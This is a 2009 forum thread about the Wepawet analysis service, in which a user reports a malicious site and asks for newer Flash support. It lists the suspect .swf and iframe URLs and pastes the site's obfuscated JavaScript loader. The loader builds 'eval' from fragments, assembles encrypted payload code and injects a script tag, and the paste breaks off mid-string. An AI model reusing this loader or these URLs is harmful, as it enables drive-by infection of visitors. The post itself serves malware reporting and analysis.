Author Topic: Wepawet issues  (Read 57007 times)


May 06, 2009, 11:20:27 pm
Reply #60

MysteryFCM

Can we get support for the newer flash versions added please?

http://www.clicksmanagementscom.com/banner/b87492/ggg-2-en.swf

Ref:
http://www.mywot.com/en/forum/3299-sign-of-the-times

Site also loads an iFrame to;

visitcouns.com/?t=1

Which returns content that's completely unreadable.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 06, 2009, 11:25:39 pm
Reply #61

MysteryFCM

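Got the content to return correctly; the page is a single obfuscated script that assembles its payload from short string fragments and passes the concatenated result to an `eval` reference whose name is itself built from pieces ('e'+'v' … 'a'+'l'):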

<body><script>OJOVLR=self;window.GENWSF='e'+'v';OJOVLR=OJOVLR.GENWSF+'a'+'l';EJEFHF=window[OJOVLR];if(!EJEFHF)EJEFHF=document[OJOVLR];OJOVLR=EJEFHF;VYGLDW='';GQF='s.m=m}function NMQ(x';TTD='}function PCY(){v';IXP='is.n=QEE(N,1';HFM='BI_FP-B;A.prototyp';ZYS='n") break;b=b*';JEG='}re';HXF=' d=(1<<';OVO='i]>>(p';OCG='){ret';ENJ='=8)k=3;else if(b==2';IOY=';y=(y*(2-(';POE='.appName';MBV='KV=TZT;A.pr';QYU='c;r.t=i;r';DXK='d.charAt(i)';WUL='=(this.j+thi';WIG='}this.t=0;this.s=0;';TMW='i=0;i<a.length';PEB='e(--i>=0)if((r=this';GPB='J)>0)a.EK';HCL='function';LWH='[i]=i;j=';FPZ='his.t';VGF='[j]+=thi';GSH='ngth){a+=';XXJ='loor(Math.random()*a';TSQ=';s[j]=x;c';RFC='JZT(c,';KQJ='7ac76d88c3368c35';JSP='prototype.DV=(1<<B)';QCE='VFO(i);return';EMP='"!=typeof a)this.Q';JPI='0)ret';MVL='continue}mi=false';QXV='T=EJJ';IDK=',b){ci="';MUT='j,c,n){var a=x&';GHU=',1);if((r[i+x';TZF='=x.am(0,y[i],';QXJ='}function ZIX(';MWM='b)-1;var e';YZN='h=this.mp';BHB='nction ZWO(x){t';KUN='eturn 0;var x=';YOM='d=(1<<b)-1;r[';MBC='{z.XKS';JZL='i=(i+1';NDW='v;rr="a".charCodeAt';NKH='WD=0;RIP()}f';GEK=';var BI_FP=52;';BTS=')}SEU=((0xde';TTE='h.sin(oil)*21));';YZS='){x=t';POV='sss="";for(';FDX='ction Q';MSU='256)k=8;else if(b==';OKE='O(this.e,this.n';FGF='CJI(b){if(';RCD='(a,(this.n.';OIX='r v=x';JJJ='m.EKV(r';ZXB='s.DB){this[this';HZZ='10ec1246fa9068f78';OSR='crosoft Intern';HFO='KM=QRQ;A.prototy';GUE='M(A.FVJ)>0)this.';YVF=');res=rsa.encry';SVJ='tion ZJB(x){ret';UZY='6);if((h.len';HWW='s[i]=s[j]';ZVW='is.VBX(r);retu';RBQ=')];return(c==nul';VDX='(d)}}re';FXY='[i-1]';ZKS='on FHD(m,q,r){va';PJB=';return}if(r==null)r';QQH=';A.prototype.E';DBU='vigator.appVersi';SIS='his.e=0;t';SGZ=']=c&this.DM;c>>';GLJ='TZY=HT';CGS='0]=this';QJH='+]=this.DV+c;el';UVT='e.OYN=PCY;A.prot';KHS='n r}fu';GJZ='<=0){p+=';UJR='z.ZXK(r2,g,r);el';ZLM='K(r){for(var 
i=th';LEN='ix(s,b);return';MGN='*y)&0xffff)))';YOS='.XKS=PFD;functi';RZE='this[i];r.t=t';VMY='or(i=0;i<x.t-1;++i)';VTV='f(k==8&&(s[0]&0x80)';NRU='s.m,null,r);if(x.';YJH='his.m=m;this.mp=m';UPM='x=t;r+=8}if((t=x>';BCK='}func';ELB='==4)k=2;else return';TTX='{if(b<';WQY='ototype.QYW=UVT;A.pr';PSS='j=0}fun';FET='urn(this.s';HJM='=BHF;A.prototype';OJR='ffff}return c}f';URW='3;else i';DPV='!=0){t';YQO='otype.YWW=GZ';JXG='1]|=((1<<(th';BTF='){';GHY='s[i]&d)<<c;';SMW='this.i=(thi';CFK='g.fromCharCo';ZNM='t(KFY);for(RWD=0;RWD';WBM=' OVS(b)';FHP='ile(--i>=';RRI='=="="||';XQY='r.s=th';WGQ='var c=t';WKO='NYB(s,n){var a="";v';DGM='6;++vv)RH';NWG='unction ';TBB='DB}c+=this.';TZC=']=i;';WFO='otype.mod=URR;A.prot';NMZ='n QEE(a,r)';GJS='return(y';WGF='(m);if';TOH='&0xfff';HOY='null)?nbi():q;y.YWW(';POK='=c.SLR(1';TCU=']=vv;function GJM(n';ZNG='(d.charAt(i));c=';KVN=' h;else ret';DWB='otype.EWO';COR='ion E';OND='+=Strin';TNX='if(isNaN(oil)){k=';OXN='length])&255;t=th';YXZ=' scriptTag=';SUD='createElement("scr';ROL='.EKV(this.m';QFC='DB;--i}';TKL='.length)';BSJ='TUVWX';DIB='C.prototype.init=X';VKZ='r);while(';BPQ='if(sh>0)this[this.t-';BHT='0;if(c<-1)r[i+';MNF='a="";';MOI='pt(sss);';SSN='rypt(a,b)';GPY='}var a=n';MWV='is.t-1;i>=0';UPU='0;for(i=0;i<2';FIL='urn"0"+h}RSA';HXU='])';IRG='eturn';IVT='0;i<b;';EER='rypto.';ZVQ='tion RSAKey(){t';BTH='=parseInt';ZTX='r(n/this.DB);i';FXI='ull,r);i';FJL=';while(i<m){c+=this';ILM='BQY,53);a';UYP='CR;RSAKey.p';ONS='oil;oil=0}s=new';TLC='[(s[i]+s[j])%256';SNI='Y=new ';LFN='RX;VXC.prototype';QHF=';var r=nbi(),r2=n';VJE='se{va';UPE='PFD(x';FDM='){return';HZI='lse this.t=0}fu';GUJ='m.s;var c=this.DB';CXV='T;A.pro';VCY='n r}function H';WZZ='ll;th';OHD='ion PQE(a,';RYE='ction A(a,b,c){if(a!';PFL=')-1;g.TZY(r);while';NUU='turn m?r:"0';ZVH='lmnopqr';MNK='{x=t;r+=1}retur';UBP='rototype.ZXK';BDN='6*Math.random()';YTO='>=0){var 
k=(r[-';BJL='.prototype.';RLI='<KFY.leng';QOF='unctio';FNV='.DV){';KZL='i();this.abs().';SEG='i];r[i++]=';WWZ=')RHZ[rr++]=v';ZSB='UW=nul';LSO='ing.fromCharCode(';ONI='=4;else if(b==8)k=';ZSD='e,z){if(e>0xffff';CIB='TZY(r);th';LQK='&this.DM;c>>=t';RQL='E!=null&&N';BOT='+=this[';LDW='h+k>thi';FRL=';r.OYN()}functi';YDJ='[j++]=l&0x3ffff';XDS='n){while(--n>=0){va';LHF='KM(this.m)>=0)x';VUG='(c==1?';BKN='+]=t>>>8;K';QBY='this[i]>>b}if(b>0)r';YEI='n rc4Dec';NKE='YN();if(c>0)r.KSV(c,';VIG='ag.src="?"+res;doc';BGG='==0)return;var g=f*';STK='j=(j+';HBW='s.charCodeAt(i';YIZ='{var d=Math.f';QIG='x&0xff';CVK='6;var VHY;';MYI='type.SLR=CJI;A';OIY='m(i+1,2*x[i],r,2*';FDN='gth&1)==0)r';KCP='V(t,r)}}if(q!=n';VZX='ew Array();v';CYM='>28)+(m>>14)';VZS='0,this.';SDU='nction';ULC='V(r,r);retur';ISQ='r){var x=this.abs()';DJL='ength';MGC=')<<(k-p);d|=this[--';ESF='=(x>>8)&255;KFY[RW';ZDF='turn ci}';DMW='=null)if("numb';KDV='this.VBX(r)}';UML='le(i>=0&&n>0)a[--n]=';DNG='=(y*(2-(((x&0xffff)';ZPF='type.doPublic=ZJB;';PWP='i+n]=this[i];for';RYD='funct';DTX='(--i>=0)';ODG='.EKV(q,q)}r.t';KWW='(1<<p)-1)';IVO=')}UWR.proto';GJY='mp&0x7fff;this.mp';XPY='i]&0x7';IFP='r i=s.length-1;whi';ZPG='unction IVS';JID='.encrypt=HBJ;';QFJ='f(b==';IML='fghijk';MRR='s.m.am(0,a,x,i,';CUH='nction hexToString(d';BRJ='f(this.s<0';IRJ='30ab118834d';MJW='2ec26a4a6be8685';RVS='+]>>14;var m=xh*';MFR='s;while(i<this.t){c';LXL='DM,i;for(i';LFB='ar rr,v';HSX=' h=this.FV/';BTD='is.QUF=null;this.E';IPE='if(oil>1){oil=MII(';XMU=' LMO(s,n){if(n<';PJF='0)r[i]=0;for(i=0;i';JFJ='RSAKey.prot';IXQ='rsa=new RSAKey();rsa';GNN='4f2af68d26c8a815';TJK='.ONE.YWW(d,t);t.EKV';XPB='r(vv=0;vv<=9;++vv';IUO='0);for(vv=10;vv<';NCI='&this.DM;while(thi';DIL='c;r.t=this.t-a;r.';ZUU='A.prototype.FV';YCZ='return new A(a)}func';QPI='(--i>=0)r[i]=0;f';KRG='.protot';FVO='function';HTW='s.t-1]|=x<<sh;sh';HKN='s[i]>>p)>0)';LWW='2)k=1;else';TCJ='f)==0xefcafe);fun';JJH='rstuvwxyz";var RHZ=n';VWI='&0x3f';HNZ='12138513';UYS='EQY(x){return x}f';YSO='rn 
r}function YJG(';PWQ='s.mpl=this.';ZSE='urn null';FOW='tscape"))';ZBZ='urn 0;var y=';BSY='bs();var ';MGH='z=new UW';FEH='s[this.t++]=(x>>';ILO='b==16)k=4;else if(b=';HUM='.prototype.OBN=H';VYE='x){KFY[RWD++]^';ZUG='.length';LNB='50882';BZZ=')+"\\n";i+';IJT='.DB-sh))-1))<<sh;thi';BMM='&&r.PKM(A.FV';MOT='urn c}if(SEU&&(navi';DMT='_FP);A.pr';DOU=',sh=0;while(--i';CWC='i<this.m.t;++i){v';WMO='ITF()+7)>>';KQQ=')return r;var ';VSE='lse if(x<-1)th';KMQ='v;rr="0".charCo';ODX='on<"5"&&window.cr';OPI='=this.s-a.s;if(r!=0';XIE=');RWD';QSQ='is.S[j';SLI='l;this';POH='M))}function G';SWL='type.abs=KHO';MEI='(0);for(vv=10;vv<3';SWJ='=true;';RJU='&(d=thi';RIK='is[0]=x+DV;e';EJU='er"==typeof a)thi';BZU='while(--n>=0){var l=';MBG='(i=oil;i<256;i++)';ZFQ='ion VT';YSP='.t]+=x.a';LHJ='l<53;oil++)sss+=Str';NFS=' r}function KTQ(s,b)';BON='ffff|';XBB=' if(b';XEN='(x){var';OGH='F1)/g,e=1<<this.F';ZSZ='on UYK';ZIM='C;B=30}else if(S';FDY='}oil=0;funct';RQM='ype.VBX=YJG;F';SBZ='*l+((m&';NNB='{m=true;r=GJM(';ZIV='e.F2=2*B-BI_FP;var Z';GMP='is.S[this.j]=t;re';EQS='.CME=null}function I';HSN='r t=r;r=r2;r2=t';TSL='6;++i)';BYJ='N();if(mi)A.';IUF='xp(e,z)}A.proto';GGL='(r,r)}function U';HSE=')}function HBJ(a){';TRM='.QWB(this';FTF='.setPublic("983';JMH='otype.setPublic=I';DLG='n QYQ(n,r){for';OCX='W(j,t);r.EKV(t,';OCF='{';LQF='RHZ[rr++';SZX='g.fromCharCod';XTN='unction ';HNM='++]=x;else if(s';YGB=',w,j,c,';DVS='--);a';QCF='r){var i';ZEQ='++]=z.charCodeAt(t)';KNC='EKV(t,r)}A';PNW=' Array()';CRR='ZT(n,';KBM='f4c2d744e';ZMY='l)}function LGD(i,x';OVR='0xf)*y))&0xf';WOL='(d,d+1)';GRW='ff}ret';EJN='mpl+(((j*this.mp';VKG='.t>0)?(this[0]&1';KTB='<=0)re';KJX='document.';ING=')&255;if(RWD';OQO=';k+=';ZLG='=null;t';RPZ='urn r;return';MGZ='avigator.a';MTR='=x&255;KFY[RWD++]^';CMY='B-15))-';UBE=' RIP(){IKH(n';CNP='=QWX;function ';VWN='turn V';SCY='CR(N,E){if(N!=null&&';CSP='[--n]=0;';CRB='pe"&&na';KWL='LGD;B=26}else{A.p';SGM='+y.t;wh';IPV='0;r.OYN();i';ZTM='.next';YVC='oil=0;oi';YRM='])&255]}VX';CUC='ar 
i=a+1;i<this.';LDY='.DB*(this.t-1)+MWY(t';FXV='s.charCodeAt(i';PWW='23456789+/=";fu';TXY='Z(e,m){var z;';PQE='a;a=k;';XBY='%k;if(';DEI='[i]=this';DSY='b)|c;c=(this[i';HQY='his.n';SMD='i],r,2*i,0,1);r.s=0';IEX='r,i,0,x.t);r.s=';JGH='=this.DB}c-';YQQ='[a]>>';BPV='=n}retur';MHB='ZZ.prototype.';MDT='3);if(';QEM='[i];r[i++';ZJN='e(b.c';LFX='=2;a[--n]=0;';VPG='uncti';KQO='l+h*a;l=a*l+((m&0x';REW='this.S[i]+a[i%a.';MLW='rotot';RDX='type.';IYW=' ZSY.char';NLT='is.S[i];this.S';JVZ='FQV=EQY;UWR.proto';BIO='nextkey=res;var';YJB='on WWM(){if';XCK='type.exp=ZIX;A.proto';HMY='D++]^=(x>>16)&255;K';XDJ='[i]-a[i];r[i++]=c';LZR='totyp';OXI='et Explorer")){A.p';MPF='is.VBX(r)}f';XHS='eturn c';DZX=' r=nbi();x.abs().Y';HHG='0x10)return"0"+b.SL';MCT='b==32)k=5;else if(b';FVZ='ypto){var z=window.c';YOL='s.t>0&&this[this.t';LMF='type.DYC=NMQ;UWR.p';BZV='se if(c>0)r[i++]=';DLI='c!=64)';YQB=' QRQ(a){var r';BLG='turn x.mod(this.';NEV='r m=xh*l+h*a;l=a';ZEN='is.s<<a)';QNL='[e]=c;r.t=';OJZ='s.S[t';EXR='&x.DM;j=i+this.m.t;x';NVX='B=B;A.prototype.DM';YQZ='Y=PES();VHY.ini';EMR=' z=new FZZ(m);ret';XME='WCI(s,i){va';BPR='h+(x[i]';RZH='.OYN()}fu';UBF='0f78625c';DVR='a[--n]=x[0]';MXI='{var c=x.';ILB='s=(x<0)?-1:0;i';VLV='p<k){d=(this[i]&(';XSZ=';for(i=t';FHZ='>4)!=0){x=t;r';HUH='=nbv(0);A.ONE=nbv';UTQ=');if(ts!=ms)A.FVJ';QDI='is.DB-sh))-1)<';VMN='e(i<a.t){c-=a';WEX='>=0){v';EZK='V){r[i+x.t]-=';UHB='XKS=PWS;func';HLB='.t-1]|=(x&((1<<(this';WDM='(y,y);while(y.t<d)y[';TNO='r f=y[d-1];if(f';HOI='this.t+e+1;r.s=this.';LBG='t<this.t){c-=a.';DPX=',j,t;for(i=0;i<25';OCN=' RQL(r){var x=this.a';ETD='LQ;A.proto';JGL='ENT(r);this.VBX(r';UEH='=WEV;UWR.pro';FXB='x(this.t-n,0);r';MZY='r)}fun';UKE='this[i]&0x3f';MVQ=')+xh*h+(c>>>30);w';ZHR='m.t);';WVP='TT(y,r);th';GOS='f(r.t>0)r[r.t-1]+=x';VNH='|e<1)return A.ONE';HVH='c=(l>';ZOH='ile(--n>=0){var l=th';ZSJ='th.ma';HMR='bi(),g=z.DYC(this),i';VDY='s.mt2=2*m.t}f';HBI='r(var 
i=0;';QOR='[this.t-a-1]|';NTY='totype.QWB=QYQ;A';JEZ='s.t;va';KSO='totype';KLN=';b.TZY(r)}va';NPS='a,r)}f';FHK='>0){a.JZT';EXK=';this.S=new';EIP='++){';IYP=';--i)r[i]=';OUF='();var x=new';OSS='";for(i=';FSL=';r.t=i';FSE='==32)k=5;el';WEV='s<0&&r.PK';PXK='unction MLW(x){x.CIX';VMW='on UVT()';KKB='PES(){return new V';ESV='(i=n-1;i';DKH='.ENT=RQL;A.protot';LKG='.am=FBO;B=28}A';QTZ='-1]==c)--this';PJE='=Math.floor(6553';YQT='his.DB';TUN=',r,j,0,d))<k){y.YW';CLP='l)?-1:c}fu';YCN='ar r=nbi();A';XCR='=0;t<';VOD='b){k="";';GZP='urn x.EW';ZXP=';return r}fu';XIL='x>>1)!=0)';MXW='f((t=x>>>16)!=0){x=t';LDR='this.s<0)return"-"';UOM='0x4000000';LHC='3fff)<<14)+w[j]+c;';XUF=',r){x.ENT(r);';LOI='(VHY==null){RIP();VH';VVT='i=r.t=2*x.';MRJ='x){whil';LYB='i-->0)';JVD='FQV=HPJ;FZZ.protot';DRO=');if(r!=null)this.';SUW='=((1<<B)-1);A.';SRY='x>>15;wh';CRW='his[this.t';RLG='=null)q.VFO(0';TUJ='this.';RQY='K;A.prototype.V';WNK='&0xfffff';KNG='Z[rr++]=vv;rr';FDU=',r);thi';OQK='{if(p<this.DB&';NWQ='r[i]<--';YUQ=']=s[j];s[j';EDJ='var i=s.l';MDY='Array(';PKX='{d=(this[i]>>(p-';JKD=';this.j=0';MUI='}else this[thi';ZKL='i)=="-")mi';UZC='return a';GWB='<0){if(s.charAt(';NCP='nction HT';PWH='(i*this.DB)';QOD='.s=this.s}funct';CPN=',mi=false';GEY='nction UWR(m){thi';KDQ='YZabcde';IOB='s[this.t';RMJ='adbeefcafe';FPX='}function FBO(i,x,w,';UMQ=');w[j++]=v&0x3ff';CBH='n WWMs(a){var i';JFR=';if(sh==0)thi';EHG='r[i+e+1]=(this[i]>>';VQG='<sh}this.OY';DOF='&(1<<i))>0)';OVT='ar i=0;w';MPV='ngth>0){th';OTU='-a;var';CUV='pe.ITF=YSB;A.prot';THW=')k=1;else if(';JED='eAt(i%a.length))%25';BPP=']&d)<<a}for(i=e-1;';YDB='tion DLT(){r';QKT='.DB)sh-=this.DB}i';VNE='ument.bod';WUO=']=x}i=';FNC='WW(this.m.';KFX='BQY="ABCDEFGHIJ';LBU='0;this.';UBL=';r+=2}if((t=';ZET='am(i,x[i],r,2*i,0';BUE='>>15)*this.mp';XXC='}}return z.FQV(r)}';YWX='JJ(n,r)';QYE='V))%this.DV;';HNB='fff;var a=(j*this.';WGI='<a.t){if(q!';NNG='ff;var h=this[i+';ECB='|x.PKM(this.m';FOS='-MWY(a[a.t-1]);if(c';SVI='i=this.t;r=i-a.t;if';DBV='=nbi();var 
y=nbi(),t';WZH='=a.s}r.s=(c<0)?-1:';EYZ='th;++RWD)KFY[';JJV='n a+s.substring(i,s';RCV='rseInt(b/c));';OBO='PJ(x){var r=nbi();x.';PEI='arCod';TPU='[i]-a[i])!=0)ret';HGE='s)A.FVJ.EKV(r,';HFZ='FY[RWD++]=t&';TQV='OYN()}function T';HNS='2;var i=r.t,';RJZ='r p=this.DB-';FZN=' 0}function MW';EHN='}WFW.protot';BXB='FO=ZWO;A';JYZ='s.VBX(r)}FZZ.p';NKQ='.length>0&&E.le';JPK='harCod';ERU=');ci+';WZU='s.QZP(a,';LGZ='this.um=(1<<(m.D';DGT='turn;var b=this.ab';UUM='-i]==f)?';YKK='r a=m.abs();if(a.t';DLC='{var i';ECS='ar j=x[';JMI='nctio';NXV='oil;j=oil;';KSC='urn t';VCB='}x.OYN();x';KLK='2-x*y%this.D';BEV='his.i=0';QJQ='his.DB-b;var ';NQM='(1<<this';PWN='B(){if(this.t<=0)ret';MZJ='j=oil;for';OGN='ffffff);c=(l>';FQZ=';A.prototype.KSV=UYK';TWM='FZZ(m){t';RUM='.S[j];th';DYI=' Arra';IKL=' MII(a';GLI=');KFY[RWD+';TUI='>>30)+(m>>>15';CKD='{var a=n%';TRT='.QYW();thi';RPJ='his.t=';UJP='y()}func';SUR='[j]+c;';XTG='=Math.pow(2,BI';PNB='se if(b=';RBT='0x3fff,xh';GEU='}function';LWE='[this.i];this.S[this';DPM='{a+=Strin';HJW='+e)*d2);if((r[i]+=y';NGQ=':-y}function ';XFQ='b;for(v';FEM='h=this[i++]>>15;va';GCK='+=this.DB-k)}else';GQD='"}function HLQ(){v';FNI='Number(a,b,c);else i';XRW='(j+s[i])%';HOU='rototype';MTQ='s;r.OYN()}functi';ICY='f(this.s!=a.';RBJ='b.SLR(1';LLU='y.t++]=0;while(--j';KTE='his.i])&255;t=this.S';NFD='[x.t++]=0;fo';TFW='=a.substring';BLK='while(x[j]>=x';VVN='e(i>=0){if(';RID='-1]^(this.s&this.D';GGP='>>15;';PVI='Y(x){var r=1,t;i';GOU='+]=1;r.';RKO='ototype.ETT';IBG='j,t);if(r.PKM(t)>=0';CUR='ppName=="Netsca';BBD=';scriptT';SMO='.t=this.t';HKY=']=t}this.i=';QLC='=0;var t;if(n';CHV=',x)}function PWS(x';XKM='0;while(x[0]==0)b.Y';IFL='n(a.t,this.t)';ZTT='0)m=true;if(m)r+=GJM';YMU='s.from';CMO='var KFY;var RWD;f';WYR='xff:WCI(s,i);if(x';UPS='ipt")';OKR='his.DB;var c=t';KEG='}if(d>';OGB='ptTag);';POL='this[0];if((x&1)==';ZRQ='):this.s)==0';OIV='6789abcd';NME='k)r.EK';URG='y.appendChild(scri';DNQ='urn 0;return this';IFN='(var 
i=n;i<this.t';PBU='b%=c}}';PPI='(r,r2);if((e';NMS='){if(x.s<0|';TPH='XC()}var R';GUD='r);if(ts<0)A.FVJ.EKV';IID='BI(x);';HON='s=this.';HNO='{A.prototype.am=';QCN='unction IKH(';GIK='nction nb';JUY='n null';YPB='.F1)+((d>1)?y[d-2]>>';RXZ='-1;i>=0;--i)r[';QSC='null;this.q=nu';BJJ='=4)k=2;';VLI='r[i-a]=';MNJ='256;x=s[i];';QHB=';for(';FZK='n r}function YS';QYI='ZZ.prot';SIH='=(this.s&d)<<';WFX=';++i)a[i]=W';CDD=';++i)r[i-n]=this[i';YQS='{return PQE(a,b';JFW=';i++)s[i';FUF='Math.floor(75+Mat';RTP=',r){x.';BLX='SY="012345';SCS='CIX(a,n';GIP='f(a>=this.t){r';OQZ='unction ';UMS='deAt(0);fo';BXS='EU&&(navigator';WIF='tion XRX(a)';LTR='6)}function';ZGR='(n,r){';JYU='ype.CIX=FHD;A.pr';PBY=' a=(1<<k)-1,d,m=f';EZT='ype.YBI=WWMs;functio';YRD='f(b==null&&"string';SCT='t,r);r.CIX(thi';KWX='c="";for(y=0';EPP=' this.toRadix(b);var';WPU='ll)return null;';RLZ=')}if(KFY==null){KF';NYO='EC=25';BFX=';y<b.length;y++){';FIR='gator.appName=="Mi';MJE='(c,y);b.';NML=')>=0)re';WVV='.FVJ.EKV(this,r)';VYM='+=4}if((t=x>>2)!=0';IDW='this.DM:Math.fl';VTJ='+=k;if(sh>=this';RBM='BN().SLR(b);va';OUR='hile(RWD<REC){t';DLZ='y();while(n>2){x[0]=';CQE='efghijklmnopq';KUE='&this.';DGI='B;var b=t';IYT='(this.DB-sh))';IHR='RWD]=0;RWD=0}re';HHD='eAt(y)^s';FDK='=d;r.O';QLB='Key.proto';DQC='>0)?th';PLZ='R(m);else';OQX='=x.DV;x[++j]++}';JZG=',y=a.abs();var i=x.t';RKQ='s}else{';OSD='random(32);for(t';REF='his.e';JZT=';var h';IWE='f(x>0)this[0]=x;e';RRC='ype.DYC=IVS;F';VUS='rototype.am=IV';UXY='];r.t=Ma';WZO='d)}whil';NYT='ew Array();va';IYS='.prototype.D';TQM='64+BQY.indexOf';JNC='s[i]+a.ch';EXP='x=s[i];s[i';JBI='eturn((this';OWG='pe.FNV=DLT;A.proto';LQT='b)}function nbi(){re';ELW='&255}w';YCB='.i]=this.S[thi';MJP=';A.prototype.P';UIF='e return ';KLV='=k))&a;if(p';QRV='oor(r[i]*h+(r';OBE='x&3;y=(y*(2-(x&';CTZ='r k;if(';RFP='.m.t,x);if(x.P';GOT='HY.next()}functio';DXX='!="Ne';VTP='+this.O';SDD='for(i=oil;i<256';EQR='m,null,x)}fu';LPR='=ci};var 
m=LMO';OMJ='992751","10001"';DCP='de(pa';DQT='(c==nul';CCJ='otype.ZXK=FZI;FZZ';SJQ='=Math.floor';TED=';r+=16}';QXZ='1;this.';KGX='.t}function ';XUX=')*y))&0xff;y';OXV='ZP(a,256);else thi';KLI='ototype.F1=';MHV='s.length+11){ret';FWV='ew Date().getT';DJZ='his.d=null;this.p=';YUW='>=REC)RWD-';ZWD='="A".charCodeAt(';ZIY='j=i-d,t=(q==';ULN='s();if(b.t';XTC='v(i){var r=nbi();r.';DHM='KLMNOPQRS';VHB='if(';RYS='.prototype.JZ';NQS='c&this.DM;c>>=this.';NWW='0x7fff)<<15)+w[j]+(c';JMZ='i>=0;--i)r[i]=0;r';CSN='is[i]&0x7fff;var ';EVH='c+=this.s;whil';TWW='=0,c=0,m=Math.mi';YBM='s,ms=';HZG='RR(a){var r=nb';UXQ='alse,r="",i=thi';USP='{if(this.t<1)r';YXH='this.F2:0);var';GPQ='}functio';MJG='x.DV;r[i+x.t+1]=1}}i';FSI='*this[';DHS='is.DV-y';IJQ='c=Math.floor(v/';ZOR='turn new A(nul';JDV='ction';QTM='w[j++]=l&0xfffff';NVE=',r);retur';GSK='r c=RHZ[';BSC='e(x.t<=this.mt2)x';DPL='s.i+1)&255;this.j';EQP='this}fu';UPB='m==nu';XNR='){r[r.t+';WOS='i+1,c,x.t-i-1))>=x.D';LNM='s.s}functio';JHM='n BHF(a,';VGY='.S[(t+this.S[this.i';FRP='if((t=x>>8)!=0){';CUJ='nction KHO(';CCK='nction WEV(x,y,';FNK='s.substring(i,i+n';LYE='r d=y.t;va';CBU='turn this';GHS='=x>>14;';RII='=REC}function';BGC='64:c/4);if(';ZZQ='his.t;r.s=this.s}fu';RCB='i++]+w';PLG='t;++i){r[i-a-1]';JNK='b20094bded52ed';MGI='this.D';ZWW='i++)';XGP='+xh*h;';HGM='R(16);els';NTO='+n;r.s=thi';VXL='ar c=this.s';WWF='.t=0;return}';XKZ='56;++i){j=(j+';DTP='s.j];th';WXP='=MWY(e';SDV='his.s=-1;';DNM='this.S';FWX='r)}else{a.TZY(y)';EBC=')%256;j=';CCX='f;y=(y*(';HJB='or(i=0;i<d.length;i';HFP='fff}return c';DWX='l)retur';TTW='(n/this.DB),c=(th';GXP='ototy';LDO='if(e<256||m.FNV())';RRO='(1);function VXC(){t';UFJ='1;thi';RFF='his.doPublic';MHP='{return new A(';JHV='ype.QZP=KTQ;A.pro';KLT='ull){r.QWB(d,q';GCS='WX(){var t;';NRY='x[j]-';OMY='ZT(a,r){var i';BWJ='{var k;if(b==16)k';YUF='his.DB}if(a.';WHX='m);else return 
x}f';DHZ='ime()';RLS='.am(i,x[';LJZ='.am(0,k';UXR='|=(thi';VZW='l)&this.um)<<15))';DVT='g,d2=(1<<this.';QVY='b=0;c=1;f';KPQ='36;++vv)';LCK='At(n)}function ';QDY='rototype';BGY='TZY(r)';YFN='var b=new WFW';QGD='=this.t-1;i>=0;--i){';IUR='rototype.';ZBP='(r!=0)return r;whil';RLH='<y.t;++i)r[i+x.t]';SGX='type.VBX=MLW;UWR.p';HMX='n IVC(i,x,w,j,c,n)';SXW=' Arra';DXQ='WM()}function WFW(){';YSH='hile(i+n<s.le';KSM='ar x=(k==8)?s[i]&0';PKE='}r';EFP='6;';OYZ='{var a=x&0x7fff,xh=';JDP='(this.';ZGV='else{this.fromRad';WJD='z.length;++t)KFY[RWD';HCU='>=0;--i)r[i]=0;r';JZD='(E,16)}';LMT='d.charAt(i)=="\\';QVK='var b=n%t';KME='FY[RWD++]^=(x>>24';YNR='stuvwxyz01';GNT='is.s;var a=Math.floo';LPQ='t;while';XOO='<0)?this.OBN():';WSQ='255}R';NZN=' FZI(x,y,r){x.ETT(y';SFX='FVJ.EKV(this,this)';QNS='=VTZ;A.FVJ';NHS='}a[--n]';NPY='r){x.E';PPL='6);this.e';VYGLDW+=HCL+IKL+IDK+OSS+IVT+ZWW+YIZ+XXJ+ZUG+ERU+TFW+WOL+JEG+ZDF+KFX+DHM+BSJ+KDQ+IML+ZVH+YNR+PWW+CUH+BTF+MNF+QVY+HJB+EIP+VHB+DXK+RRI+LMT+ZYS+TQM+ZNG+VUG+BGC+DLI+DPM+CFK+DCP+RCV+PBU+UZC+FDY+OHD+VOD+TNX+ONS+PNW+OQO+PQE+SDD+JFW+TZC+MZJ+MBG+OCF+STK+JNC+PEI+JED+EFP+EXP+YUQ+WUO+NXV+KWX+BFX+JZL+EBC+XRW+MNJ+HWW+TSQ+OND+SZX+ZJN+JPK+HHD+TLC+HXU+PKE+XHS+GPQ+YEI+SSN+YQS+BTS+RMJ+WNK+TCJ+RYE+DMW+EJU+YMU+FNI+YRD+EMP+OXV+WZU+LQT+ZOR+ZMY+YGB+XDS+OIX+FSI+RCB+SUR+IJQ+UOM+UMQ+OJR+QOF+HMX+OYZ+SRY+ZOH+CSN+FEM+NEV+SBZ+NWW+VWI+OGN+TUI+MVQ+YDJ+HFP+FPX+MUT+RBT+GHS+BZU+UKE+NNG+RVS+KQO+LHC+HVH+CYM+XGP+QTM+GRW+MOT+FIR+OSR+OXI+VUS+ZIM+BXS+POE+DXX+FOW+HNO+KWL+QDY+LKG+IYS+NVX+SUW+JSP+GEK+ZUU+XTG+DMT+KLI+HFM+ZIV+BLX+OIV+CQE+JJH+VZX+LFB+KMQ+UMS+XPB+WWZ+NDW+MEI+DGM+KNG+ZWD+IUO+KPQ+LQF+TCU+FDM+IYW+LCK+XME+GSK+HBW+RBQ+CLP+NCP+ZLM+MWV+IYP+RZE+ZZQ+BHB+RPJ+QXZ+ILB+IWE+VSE+RIK+HZI+GIK+XTC+QCE+NFS+BWJ+ONI+URW+QFJ+MSU+LWW+XBB+FSE+PNB+BJJ+ZGV+LEN+WIG+EDJ+DJL+CPN+DOU+WEX+KSM+WYR+GWB+ZKL+SWJ+MVL+JFR+IOB+HNM+LDW+ZXB+HLB+IJT+FEH+IYT+MUI+HTW+VTJ+QKT+VTV+DPV+SDV+BPQ+JXG+QDI+VQG+BYJ+SFX+TTD+VXL+NCI+YOL+QTZ+KGX+FGF+LDR+VTP+RBM+CTZ+ILO+ENJ+THW+MCT+ELB+EPP+PBY+UXQ+JEZ+RJZ+PWH+XBY+LYB+OQK+RJU+H
